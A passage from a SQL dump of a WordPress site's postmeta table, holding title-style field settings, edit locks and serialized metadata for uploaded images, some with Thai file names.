0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(700,201,'title_style','default'),
(701,201,'_title_style','field_5d1a0217cf408'),
(703,203,'title_style','default'),
(704,203,'_title_style','field_5d1a0217cf408'),
(706,205,'title_style','default'),
(707,205,'_title_style','field_5d1a0217cf408'),
(709,207,'title_style','default'),
(710,207,'_title_style','field_5d1a0217cf408'),
(711,208,'title_style','default'),
(712,208,'_title_style','field_5d1a0217cf408'),
(714,210,'title_style','default'),
(715,210,'_title_style','field_5d1a0217cf408'),
(717,212,'title_style','default'),
(718,212,'_title_style','field_5d1a0217cf408'),
(719,213,'title_style','default'),
(720,213,'_title_style','field_5d1a0217cf408'),
(722,215,'title_style','default'),
(723,215,'_title_style','field_5d1a0217cf408'),
(724,216,'title_style','default'),
(725,216,'_title_style','field_5d1a0217cf408'),
(726,26,'_wp_old_date','2024-08-23'),
(728,35,'_wp_old_date','2024-08-23'),
(730,36,'_wp_old_date','2024-08-23'),
(732,37,'_wp_old_date','2024-08-23'),
(734,38,'_wp_old_date','2024-08-23'),
(736,39,'_wp_old_date','2024-08-23'),
(738,217,'title_style','default'),
(739,217,'_title_style','field_5d1a0217cf408'),
(740,218,'title_style','default'),
(741,218,'_title_style','field_5d1a0217cf408'),
(742,219,'title_style','default'),
(743,219,'_title_style','field_5d1a0217cf408'),
(745,221,'title_style','default'),
(746,221,'_title_style','field_5d1a0217cf408'),
(747,222,'title_style','default'),
(748,222,'_title_style','field_5d1a0217cf408'),
(749,223,'title_style','default'),
(750,223,'_title_style','field_5d1a0217cf408'),
(751,224,'title_style','default'),
(752,224,'_title_style','field_5d1a0217cf408'),
(753,225,'title_style','default'),
(754,225,'_title_style','field_5d1a0217cf408'),
(755,226,'title_style','default'),
(756,226,'_title_style','field_5d1a0217cf408'),
(758,228,'title_style','default'),
(759,228,'_title_style','field_5d1a0217cf408'),
(760,229,'title_style','default'),
(761,229,'_title_style','field_5d1a0217cf408'),
(762,231,'title_style','default'),
(763,231,'_title_style','field_5d1a0217cf408'),
(764,26,'_wp_old_date','2024-08-26'),
(766,35,'_wp_old_date','2024-08-26'),
(768,36,'_wp_old_date','2024-08-26'),
(770,37,'_wp_old_date','2024-08-26'),
(772,38,'_wp_old_date','2024-08-26'),
(774,39,'_wp_old_date','2024-08-26'),
(782,235,'title_style','default'),
(783,235,'_title_style','field_5d1a0217cf408'),
(784,236,'title_style','default'),
(785,236,'_title_style','field_5d1a0217cf408'),
(786,237,'title_style','default'),
(787,237,'_title_style','field_5d1a0217cf408'),
(788,238,'title_style','default'),
(789,238,'_title_style','field_5d1a0217cf408'),
(790,239,'title_style','default'),
(791,239,'_title_style','field_5d1a0217cf408'),
(792,240,'title_style','default'),
(793,240,'_title_style','field_5d1a0217cf408'),
(794,241,'title_style','default'),
(795,241,'_title_style','field_5d1a0217cf408'),
(796,242,'title_style','default'),
(797,242,'_title_style','field_5d1a0217cf408'),
(798,243,'title_style','default'),
(799,243,'_title_style','field_5d1a0217cf408'),
(800,244,'title_style','default'),
(801,244,'_title_style','field_5d1a0217cf408'),
(802,245,'title_style','default'),
(803,245,'_title_style','field_5d1a0217cf408'),
(804,246,'title_style','default'),
(805,246,'_title_style','field_5d1a0217cf408'),
(806,247,'title_style','default'),
(807,247,'_title_style','field_5d1a0217cf408'),
(808,248,'title_style','default'),
(809,248,'_title_style','field_5d1a0217cf408'),
(816,249,'title_style','default'),
(817,249,'_title_style','field_5d1a0217cf408'),
(818,250,'title_style','default'),
(819,250,'_title_style','field_5d1a0217cf408'),
(821,252,'title_style','default'),
(822,252,'_title_style','field_5d1a0217cf408'),
(823,253,'title_style','default'),
(824,253,'_title_style','field_5d1a0217cf408'),
(828,255,'title_style','default'),
(829,255,'_title_style','field_5d1a0217cf408'),
(831,257,'title_style','default'),
(832,257,'_title_style','field_5d1a0217cf408'),
(834,259,'title_style','default'),
(835,259,'_title_style','field_5d1a0217cf408'),
(836,260,'_wp_attached_file','2024/08/O27.jpg'),
(837,260,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:4:\"file\";s:15:\"2024/08/O27.jpg\";s:8:\"filesize\";i:232415;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"O27-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20744;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"O27-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127046;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"O27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10207;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"O27-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84138;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:16:\"O27-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212278;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"O27-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26596;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(838,261,'title_style','default'),
(839,261,'_title_style','field_5d1a0217cf408'),
(840,262,'title_style','default'),
(841,262,'_title_style','field_5d1a0217cf408'),
(843,264,'title_style','default'),
(844,264,'_title_style','field_5d1a0217cf408'),
(846,266,'title_style','default'),
(847,266,'_title_style','field_5d1a0217cf408'),
(848,267,'title_style','default'),
(849,267,'_title_style','field_5d1a0217cf408'),
(850,268,'title_style','default'),
(851,268,'_title_style','field_5d1a0217cf408'),
(852,269,'title_style','default'),
(853,269,'_title_style','field_5d1a0217cf408'),
(854,270,'title_style','default'),
(855,270,'_title_style','field_5d1a0217cf408'),
(856,271,'title_style','default'),
(857,271,'_title_style','field_5d1a0217cf408'),
(858,272,'title_style','default'),
(859,272,'_title_style','field_5d1a0217cf408'),
(860,273,'title_style','default'),
(861,273,'_title_style','field_5d1a0217cf408'),
(862,274,'title_style','default'),
(863,274,'_title_style','field_5d1a0217cf408'),
(864,275,'title_style','default'),
(865,275,'_title_style','field_5d1a0217cf408'),
(866,276,'title_style','default'),
(867,276,'_title_style','field_5d1a0217cf408'),
(868,277,'title_style','default'),
(869,277,'_title_style','field_5d1a0217cf408'),
(870,278,'title_style','default'),
(871,278,'_title_style','field_5d1a0217cf408'),
(872,279,'title_style','default'),
(873,279,'_title_style','field_5d1a0217cf408'),
(874,280,'title_style','default'),
(875,280,'_title_style','field_5d1a0217cf408'),
(876,281,'title_style','default'),
(877,281,'_title_style','field_5d1a0217cf408'),
(878,282,'title_style','default'),
(879,282,'_title_style','field_5d1a0217cf408'),
(880,283,'title_style','default'),
(881,283,'_title_style','field_5d1a0217cf408'),
(882,284,'title_style','default'),
(883,284,'_title_style','field_5d1a0217cf408'),
(885,286,'title_style','default'),
(886,286,'_title_style','field_5d1a0217cf408'),
(887,287,'title_style','default'),
(888,287,'_title_style','field_5d1a0217cf408'),
(889,288,'title_style','default'),
(890,288,'_title_style','field_5d1a0217cf408'),
(891,289,'title_style','default'),
(892,289,'_title_style','field_5d1a0217cf408'),
(893,290,'title_style','default'),
(894,290,'_title_style','field_5d1a0217cf408'),
(895,291,'title_style','default'),
(896,291,'_title_style','field_5d1a0217cf408'),
(897,292,'title_style','default'),
(898,292,'_title_style','field_5d1a0217cf408'),
(899,293,'title_style','default'),
(900,293,'_title_style','field_5d1a0217cf408'),
(902,295,'title_style','default'),
(903,295,'_title_style','field_5d1a0217cf408'),
(904,296,'title_style','default'),
(905,296,'_title_style','field_5d1a0217cf408'),
(906,297,'title_style','default'),
(907,297,'_title_style','field_5d1a0217cf408'),
(908,298,'title_style','default'),
(909,298,'_title_style','field_5d1a0217cf408'),
(910,299,'title_style','default'),
(911,299,'_title_style','field_5d1a0217cf408'),
(912,300,'title_style','default'),
(913,300,'_title_style','field_5d1a0217cf408'),
(914,301,'title_style','default'),
(915,301,'_title_style','field_5d1a0217cf408'),
(916,302,'title_style','default'),
(917,302,'_title_style','field_5d1a0217cf408'),
(918,303,'title_style','default'),
(919,303,'_title_style','field_5d1a0217cf408'),
(920,304,'title_style','default'),
(921,304,'_title_style','field_5d1a0217cf408'),
(923,306,'_edit_lock','1724989362:2'),
(928,306,'_edit_last','2'),
(930,306,'title_style','default'),
(931,306,'_title_style','field_5d1a0217cf408'),
(932,306,'related',''),
(933,306,'_related','field_603b51c3e183e'),
(934,308,'title_style','default'),
(935,308,'_title_style','field_5d1a0217cf408'),
(936,308,'related',''),
(937,308,'_related','field_603b51c3e183e'),
(945,310,'_wp_attached_file','2024/08/messageImage_1724923827910-1.jpg'),
(946,310,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:923;s:6:\"height\";i:871;s:4:\"file\";s:40:\"2024/08/messageImage_1724923827910-1.jpg\";s:8:\"filesize\";i:297923;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"messageImage_1724923827910-1-300x283.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33433;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"messageImage_1724923827910-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10705;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"messageImage_1724923827910-1-768x725.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151046;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"messageImage_1724923827910-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25039;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(947,311,'_wp_attached_file','2024/08/ปลูกต้นไม้-scaled.jpg'),
(948,311,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1810;s:6:\"height\";i:2560;s:4:\"file\";s:49:\"2024/08/ปลูกต้นไม้-scaled.jpg\";s:8:\"filesize\";i:817002;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"ปลูกต้นไม้-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24144;}s:5:\"large\";a:5:{s:4:\"file\";s:43:\"ปลูกต้นไม้-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192485;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"ปลูกต้นไม้-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9855;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"ปลูกต้นไม้-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212287;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:44:\"ปลูกต้นไม้-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:367284;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:44:\"ปลูกต้นไม้-1448x2048.jpg\";s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:576791;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:42:\"ปลูกต้นไม้-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22372;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:34:\"ปลูกต้นไม้.jpg\";}'),
(949,306,'_generateblocks_dynamic_css_version','1.9.1'),
(952,312,'title_style','default'),
(953,312,'_title_style','field_5d1a0217cf408'),
(954,312,'related',''),
(955,312,'_related','field_603b51c3e183e'),
(957,306,'_thumbnail_id','311'),
(960,315,'title_style','default'),
(961,315,'_title_style','field_5d1a0217cf408'),
(962,315,'related',''),
(963,315,'_related','field_603b51c3e183e'),
(966,317,'title_style','default'),
(967,317,'_title_style','field_5d1a0217cf408'),
(968,317,'related',''),
(969,317,'_related','field_603b51c3e183e'),
(970,319,'_wp_attached_file','2024/08/ปลูกต้นไม้-1-scaled.jpg'),
(971,319,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1810;s:6:\"height\";i:2560;s:4:\"file\";s:51:\"2024/08/ปลูกต้นไม้-1-scaled.jpg\";s:8:\"filesize\";i:817002;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"ปลูกต้นไม้-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24144;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"ปลูกต้นไม้-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192485;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"ปลูกต้นไม้-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9855;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"ปลูกต้นไม้-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212287;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:46:\"ปลูกต้นไม้-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:367284;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:46:\"ปลูกต้นไม้-1-1448x2048.jpg\";s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:576791;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:44:\"ปลูกต้นไม้-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22372;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"ปลูกต้นไม้-1.jpg\";}'),
(974,320,'title_style','default'),
(975,320,'_title_style','field_5d1a0217cf408'),
(976,320,'related',''),
(977,320,'_related','field_603b51c3e183e'),
(981,323,'title_style','default'),
(982,323,'_title_style','field_5d1a0217cf408'),
(983,323,'related',''),
(984,323,'_related','field_603b51c3e183e'),
(987,325,'title_style','default'),
(988,325,'_title_style','field_5d1a0217cf408'),
(989,325,'related',''),
(990,325,'_related','field_603b51c3e183e'),
(993,326,'title_style','default'),
(994,326,'_title_style','field_5d1a0217cf408'),
(995,326,'related',''),
(996,326,'_related','field_603b51c3e183e'),
(998,328,'_wp_attached_file','2024/08/messageImage_1724923827910.jpg'),
(999,328,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:923;s:6:\"height\";i:871;s:4:\"file\";s:38:\"2024/08/messageImage_1724923827910.jpg\";s:8:\"filesize\";i:297923;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"messageImage_1724923827910-300x283.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33433;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"messageImage_1724923827910-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10705;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"messageImage_1724923827910-768x725.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151046;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"messageImage_1724923827910-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25039;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1043,336,'title_style','default'),
(1044,336,'_title_style','field_5d1a0217cf408'),
(1045,337,'title_style','default'),
(1046,337,'_title_style','field_5d1a0217cf408'),
(1047,338,'title_style','default'),
(1048,338,'_title_style','field_5d1a0217cf408'),
(1049,339,'title_style','default'),
(1050,339,'_title_style','field_5d1a0217cf408'),
(1052,341,'title_style','default'),
(1053,341,'_title_style','field_5d1a0217cf408'),
(1054,342,'title_style','default'),
(1055,342,'_title_style','field_5d1a0217cf408'),
(1057,344,'title_style','default'),
(1058,344,'_title_style','field_5d1a0217cf408'),
(1059,345,'title_style','default'),
(1060,345,'_title_style','field_5d1a0217cf408'),
(1061,346,'title_style','default'),
(1062,346,'_title_style','field_5d1a0217cf408'),
(1063,347,'_wp_attached_file','2024/09/ms.html'),
(1064,347,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:3582;}'),
(1065,347,'_edit_lock','1725235361:1'),
(1066,349,'_edit_lock','1725339443:2'),
(1067,350,'_wp_attached_file','2024/09/457381847_122174879558202781_6672815312348190309_n.jpg'),
(1068,350,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2024/09/457381847_122174879558202781_6672815312348190309_n.jpg\";s:8:\"filesize\";i:798828;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"457381847_122174879558202781_6672815312348190309_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28102;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"457381847_122174879558202781_6672815312348190309_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223486;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"457381847_122174879558202781_6672815312348190309_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11085;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"457381847_122174879558202781_6672815312348190309_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:234041;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"457381847_122174879558202781_6672815312348190309_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:397531;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"457381847_122174879558202781_6672815312348190309_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28314;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1069,349,'_generateblocks_dynamic_css_version','1.9.1'),
(1070,351,'_wp_attached_file','2024/09/457791533_122174879846202781_8796933381137744998_n.jpg'),
(1071,351,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1453;s:4:\"file\";s:62:\"2024/09/457791533_122174879846202781_8796933381137744998_n.jpg\";s:8:\"filesize\";i:491992;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"457791533_122174879846202781_8796933381137744998_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14800;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"457791533_122174879846202781_8796933381137744998_n-1024x727.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:727;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108988;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"457791533_122174879846202781_8796933381137744998_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6785;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"457791533_122174879846202781_8796933381137744998_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68585;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"457791533_122174879846202781_8796933381137744998_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:201840;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"457791533_122174879846202781_8796933381137744998_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14374;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1074,349,'_thumbnail_id','351'),
(1075,349,'_edit_last','2'),
(1078,349,'title_style','default'),
(1079,349,'_title_style','field_5d1a0217cf408'),
(1080,349,'related',''),
(1081,349,'_related','field_603b51c3e183e'),
(1082,352,'title_style','default'),
(1083,352,'_title_style','field_5d1a0217cf408'),
(1084,352,'related',''),
(1085,352,'_related','field_603b51c3e183e'),
(1089,354,'title_style','default'),
(1090,354,'_title_style','field_5d1a0217cf408'),
(1091,354,'related',''),
(1092,354,'_related','field_603b51c3e183e'),
(1095,355,'title_style','default'),
(1096,355,'_title_style','field_5d1a0217cf408'),
(1097,355,'related',''),
(1098,355,'_related','field_603b51c3e183e'),
(1099,356,'_wp_attached_file','2024/09/457726437_122174879864202781_4352571805851092151_n.jpg'),
(1100,356,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1453;s:4:\"file\";s:62:\"2024/09/457726437_122174879864202781_4352571805851092151_n.jpg\";s:8:\"filesize\";i:633053;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"457726437_122174879864202781_4352571805851092151_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18346;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"457726437_122174879864202781_4352571805851092151_n-1024x727.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:727;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149872;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"457726437_122174879864202781_4352571805851092151_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7547;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"457726437_122174879864202781_4352571805851092151_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92892;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"457726437_122174879864202781_4352571805851092151_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:277174;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"457726437_122174879864202781_4352571805851092151_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20228;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1103,357,'title_style','default'),
(1104,357,'_title_style','field_5d1a0217cf408'),
(1105,357,'related',''),
(1106,357,'_related','field_603b51c3e183e'),
(1107,358,'_edit_lock','1725339679:2'),
(1108,359,'_wp_attached_file','2024/09/457381847_122174879558202781_6672815312348190309_n-1.jpg'),
